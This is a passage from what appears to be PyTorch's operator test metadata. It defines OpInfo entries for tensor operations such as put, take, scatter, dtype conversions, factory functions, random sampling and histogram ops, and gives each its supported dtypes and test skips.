supports_autograd=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76571 DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values', dtypes=(torch.float16, torch.float32, torch.float64)), )), OpInfo('put', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_gradgrad=False, # vmap complains of the sizes skips=( # Problem, needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ), sample_inputs_func=sample_inputs_put), OpInfo('take', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), check_batched_grad=False, # vmap complains of the sizes supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_take, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), error_inputs_func=error_inputs_take), OpInfo('scatter', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_scatter, error_inputs_func=error_inputs_scatter_and_scatter_add), OpInfo('bfloat16', op=lambda x, *args, **kwargs: x.bfloat16(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), OpInfo('bool', op=lambda x, *args, **kwargs: x.bool(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.int8,)), )), OpInfo('byte', op=lambda x, *args, **kwargs: x.byte(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, # The autograd test runner cannot handle functions that change dtype supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('char', op=lambda x, *args, **kwargs: x.char(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, # The autograd test runner cannot handle functions that change dtype supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('double', op=lambda x, *args, **kwargs: x.double(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('float', op=lambda x, *args, **kwargs: x.float(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('half', op=lambda x, *args, **kwargs: x.half(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=True, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('int', op=lambda x, *args, **kwargs: x.int(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('long', op=lambda x, *args, **kwargs: x.long(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('short', op=lambda x, *args, **kwargs: x.short(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('chalf', op=lambda x, *args, **kwargs: x.chalf(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), # use of lambda doesn't work with test_normalize_operator_exhaustive DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: "index_select" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_noncontiguous_samples', dtypes=(torch.float, torch.cfloat)), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager', device_type='cpu'), # TypeError: 'int' object is not iterable DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view', device_type='cpu'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view', device_type='cpu'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' # RuntimeError: "neg_conj_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), ) ), OpInfo('empty_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, reference_inputs_func=reference_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_complex_half_reference_testing'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('zeros_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('ones_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('randn_like', dtypes=floating_types_and(torch.half, torch.bfloat16, torch.complex32, torch.complex64, torch.complex128), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randn_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, supports_sparse_csr=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Expected: randn_like is not comparable between dtypes"), 'TestCommon', 'test_complex_half_reference_testing'), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), )), OpInfo('rand_like', dtypes=floating_types_and(torch.half, torch.bfloat16, torch.complex32, torch.complex64, torch.complex128), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randn_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: randn_like is not comparable between dtypes"), 'TestCommon', 'test_complex_half_reference_testing'), )), OpInfo('randint_like', dtypes=all_types_and(torch.half, torch.bfloat16), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randint_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_randint_like, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('full_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_full_like, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('new_zeros', op=lambda x, *args, **kwargs: x.new_zeros(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('new_ones', op=lambda x, *args, **kwargs: x.new_ones(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('new_empty', op=lambda x, *args, **kwargs: x.new_empty(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: new_empty is not comparable"), 'TestCommon', 'test_complex_half_reference_testing'), ), supports_autograd=False), OpInfo('empty', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_empty, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestLazyOpInfo'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_complex_half_reference_testing'), )), OpInfo('new_full', op=lambda x, *args, **kwargs: x.new_full(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_full, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('multinomial', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.multinomial, inp, *args, **kwargs), method_variant=lambda inp, *args, **kwargs: wrapper_set_seed(torch.Tensor.multinomial, inp, *args, **kwargs), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), supports_out=True, sample_inputs_func=sample_inputs_multinomial, error_inputs_func=error_inputs_multinomial, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Strides are not the same! # This may not be reproducible in CI DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning')), supports_autograd=False), OpInfo('normal', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.normal, inp, *args, **kwargs), # The inplace variant (Tensor.normal_) is different from torch.normal inplace_variant=None, dtypes=floating_types_and(torch.bfloat16, torch.half), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, sample_inputs_func=sample_inputs_normal_tensor_first, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Tensor-likes are not close! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # NotImplementedError not raised DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), # Computed gradient is incorrect -- would be an exfail but gradgrad somehow passes DecorateInfo(unittest.skip("Gradients are incorrect!"), 'TestGradients'),)), OpInfo('normal', # This has its own variant b/c OpInfos assume the first arg is a Tensor but it is not here variant_test_name='number_mean', op=lambda std, mean, *args, **kwargs: wrapper_set_seed(torch.normal, mean, std, *args, **kwargs), # The inplace variant (Tensor.normal_) is different from torch.normal inplace_variant=None, dtypes=floating_types_and(torch.bfloat16, torch.half), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, sample_inputs_func=sample_inputs_normal_tensor_second, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # NotImplementedError not raised DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), # Computed gradient is incorrect -- would be an exfail but gradgrad somehow passes DecorateInfo(unittest.skip("Gradients are incorrect!"), 'TestGradients'),)), OpInfo('bernoulli', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.bernoulli, inp, *args, **kwargs), # The inplace variant (Tensor.bernoulli_) is different from torch.bernoulli inplace_variant=None, method_variant=lambda inp, *args, **kwargs: wrapper_set_seed(torch.Tensor.bernoulli, inp, *args, **kwargs), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_bernoulli, skips=( # vmap: We do not yet support calling random operations inside of vmap DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Expected RuntimeError when doing an unsafe cast from a result of # dtype torch.float32 into an out= with dtype torch.lon DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'))), OpInfo('scatter_add', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_add, error_inputs_func=error_inputs_scatter_and_scatter_add, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('stack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_stack, assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # https://github.com/pytorch/pytorch/issues/77046 DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), ), ), OpInfo('hstack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), BinaryUfuncInfo('hypot', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False), OpInfo('histogram', dtypes=floating_types(), dtypesIfCUDA=_dispatch_dtypes(), # histogram is only implemented on CPU sample_inputs_func=sample_inputs_histogram, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0): # return torch.histogram(i0, 1, weight=tensor(-0.5735, dtype=torch.float32), density=False) # ~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Not Implemented on XLA. DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla'), )), OpInfo('histogramdd', dtypes=floating_types(), dtypesIfCUDA=_dispatch_dtypes(), # histogramdd is only implemented on CPU sample_inputs_func=sample_inputs_histogramdd, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('histc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64), sample_inputs_func=sample_inputs_histc, supports_out=True, supports_autograd=False, skips=( # CUDA histc returns a float tensor but does not correctly warn when passed an integral out tensor # "AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast # from a result of dtype torch.float32 into an out= with dtype torch.long" DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cuda'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), )), OpInfo('bincount', dtypes=integral_types_and(), sample_inputs_func=sample_inputs_bincount, supports_out=False, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('bucketize', dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), sample_inputs_func=sample_inputs_bucketize, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments DecorateInfo(unittest.skip("Expected failure!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('searchsorted', dtypes=all_types_and(torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and(torch.float16), sample_inputs_func=sample_inputs_searchsorted, supports_autograd=False, ref=reference_searchsorted, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.skip("Expected failure!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('cat', ref=_cat_np, aliases=('concat',), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.complex32), sample_inputs_func=sample_inputs_cat_concat, reference_inputs_func=reference_inputs_cat, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, skips=( # RuntimeError: Arguments for call not valid. # Expected a value of type 'List[Tensor]' for argument # 'tensors' but instead found type 'Tensor (inferred)'. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # see https://github.com/pytorch/pytorch/issues/71286 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness'),)), OpInfo('vstack', aliases=('row_stack',), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: _fn() Expected a value of type # 'Tensor (inferred)' for argument 't0' but instead found type 'tuple'. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'),)), OpInfo('dstack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('unfold', op=lambda x, *args: x.unfold(*args), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), backward_dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Skip operator schema test because this is a functional and not an operator DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), sample_inputs_func=sample_inputs_unfold), OpInfo('msort', dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_msort), OpInfo('movedim', aliases=('moveaxis',), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_movedim_moveaxis), OpInfo('renorm', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_renorm, error_inputs_func=error_inputs_renorm), ShapeFuncInfo('repeat', op=lambda x, dims: x.repeat(dims), ref=np.tile, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_repeat_tile, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('squeeze', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, # https://github.com/pytorch/pytorch/issues/66357 